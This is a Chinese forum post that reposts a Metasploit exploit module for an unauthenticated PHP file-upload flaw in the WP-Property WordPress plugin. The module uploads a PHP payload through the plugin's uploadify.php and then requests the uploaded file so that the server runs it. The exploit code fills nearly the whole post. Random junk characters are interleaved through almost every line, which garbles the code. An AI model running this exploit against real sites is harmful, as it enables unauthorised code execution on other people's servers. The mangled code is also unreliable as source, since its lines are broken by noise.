WordPress WP-Property PHP 文件上传漏洞; d/ G2 T- T( V& F2 Z* |6 y$ C! t
/ m) F5 O) _+ G3 U p+ o: `# E' z ## # This file is part of the Metasploit Framework and may be subject to
+ Y( X8 T2 J& h, h6 |# Y) q, s, L% U8 s1 l8 U
# redistribution and commercial restrictions. Please see the Metasploit
% P$ A. s# D, P1 v. s# u, Y
; ]" ~6 Y$ ~6 M* G( @# Framework web site for more information on licensing and terms of use.
/ v3 q% M- q' e" Z4 c: i* K; @) j. V- o h& D1 k2 K
# http://metasploit.com/framework/ ##
3 D! k( V7 O, J9 u# ?' s+ m4 b: B! `( h
- W: R) V9 u, R9 C9 u% K: l
" `% Y5 V' K6 j( o% Q- E
" A6 E* y5 p9 ?$ c! l, Z0 g
, b; d' B5 H2 o4 `require 'msf/core'* H5 ]4 W; U' _, B/ C+ Q
require 'msf/core/exploit/php_exe'
0 G s& b, [1 }0 g7 V9 I2 B z8 B; z
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',' @! H8 I5 ?$ ?7 l% ?" Q/ O5 c
'Description' => %q{* I$ ]" z2 @3 Y/ T" |
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>- ?+ b: |( R1 `
[4 T+ O V# {; W& \3 u- H. q+ R3 V, N6 Z
'Sammy FORGIT', # initial discovery
( e+ j b* n7 m7 H( j'James Fitts <fitts.james[at]gmail.com>' # metasploit module& N) @4 e1 ~' t, R# r
],
1 p( V% i3 e1 O. R% i! V6 m7 [) X'License' => MSF_LICENSE,6 z) o Q, i: l3 I. u
'References' =>
& ~; u. q. g3 }" Y; D- G[
! A6 w |5 ~! \' e6 G[ 'OSVDB', '82656' ],
* m( V$ I8 a" ?$ t[ 'BID', '53787' ],: l* K* R4 S4 |, n4 `8 E/ c
[ 'EDB', '18987'],1 _) Z" f, h, ^+ u1 i4 O; U0 l
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]+ E, C3 M9 W* M: ~
],1 ^. \# M/ W9 F8 e6 S
'Payload' =>+ J+ t6 V% L- j8 X
{
. }; C0 x. a/ T' x'BadChars' => "\x00",
' p" B/ o3 N4 e0 O3 u! J},
! O- L* _3 B& P9 y- `2 D/ z'Platform' => 'php',2 G0 I% X( M6 ~7 z
'Arch' => ARCH_PHP,
: [; J, {7 @+ H5 s'Targets' =>
3 m8 H/ F4 s+ p/ J% Q/ O/ g[
/ V) v0 ~. S' | y+ H4 L0 g[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ G& u0 I3 a J) i" \ ?[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
0 Q8 U6 d# A+ V& S( F: S],
6 @' Z% B3 A6 w3 s3 S% a'DefaultTarget' => 0,
2 W+ E7 _. [3 u8 A& I4 h% j% g'DisclosureDate' => 'Mar 26 2012'))$ p; T, N* w1 A, D% B
$ v: B- p6 P# Kregister_options(5 [5 R5 G4 ? O) |' T ~
[. P( v/ u e# N( j1 j
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
7 ^# ]# g* q1 s. x6 x8 v], self.class)3 G' L3 f4 |, \. w/ ?$ [
end
z8 `8 N3 `( [3 Z: w2 w$ O# h/ g1 n0 S- ^2 m
def check! G8 q9 Q. z) H( o
uri = target_uri.path8 e4 L" T: T) }- O9 v' b
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',! ]) B3 U) S* b: T# S) N+ l9 I
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"$ Q! L; W/ \/ G5 f% n
})
; `, n, h, C" e2 W; v1 l3 @
5 H, l5 q. \6 \: Eif not res or res.code != 200# P* W6 D, P8 ]! \2 w$ d
return Exploit::CheckCode::Unknown7 D/ I/ n& l7 X* F0 `& \
end
; O' i$ @4 U* c Z" ~8 v" [* Y; K2 @0 e) d/ _* `
return Exploit::CheckCode::Appears& S! o. F5 h$ u8 G
end2 P, |( a; i. k- C r
' X5 z& G. i9 N; _def exploit" j* j5 q: w }, c* p
uri = target_uri.path* R* i6 e9 P5 s$ M# g
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
& Y3 D( S; |/ f. _- ?
; H4 O0 Z. M Q2 ndata = Rex::MIME::Message.new3 _; j# U3 R. Y; H& }: E
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")4 A$ U' L6 W c* M5 k: b) R9 P
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
! }8 x4 `; q0 U& @0 spost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
: D- h5 x7 T& X8 A6 p+ `
# ~6 K: v9 R# oprint_status("#{peer} - Uploading payload #{@payload_name}")5 O9 D" @: F/ k$ Z4 l3 l
res = send_request_cgi({# c2 g& m6 O, g& `3 A
'method' => 'POST',
, d8 M# r! B( ]& l" P'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",8 u0 ?7 z1 a& S2 z' v4 J& D
'ctype' => "multipart/form-data; boundary=#{data.bound}",' w: {1 R" Y4 `8 K3 d2 V5 `
'data' => post_data# S A) @- q9 t1 s2 Q F
})1 N- `) _% w ?5 g( U* y9 w
3 f0 I1 K: t% |: C. g
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
- M( o$ J. ~/ o4 J# C( d! Nfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")# [" D; y" A4 a% X) ^4 ]7 d/ P B
end C6 e4 k, \/ Y4 H* }* {: K6 V
" y D2 b! C. [9 B7 [! r
upload_uri = res.body- _2 B3 y# }- N& k- I4 W
/ K$ e! F; P1 L
print_status("#{peer} - Executing payload #{@payload_name}"); @( Y8 I V( q& Q+ ?- z- L
res = send_request_raw({- [2 W5 z- y' z: Z# s
'uri' => upload_uri,
# {- q* _' s3 O; \'method' => 'GET'
# ]. C% |8 @( U# T2 U})
& Z1 m7 Y5 d1 ]! V" i3 u" l& v' Jend0 H* e/ C% e( s; v3 o1 O+ w3 A# V
end
9 Z- B m- ~. ^: ?5 `' c9 c$ G* y% {1 E- S7 y
不要问我这写的是什么 怎么利用 我是说msf.' @- L% s; D/ F
5 q/ `* G: J4 q" g4 l
|
发表于 2013-1-4 19:51:30
收藏
支持
反对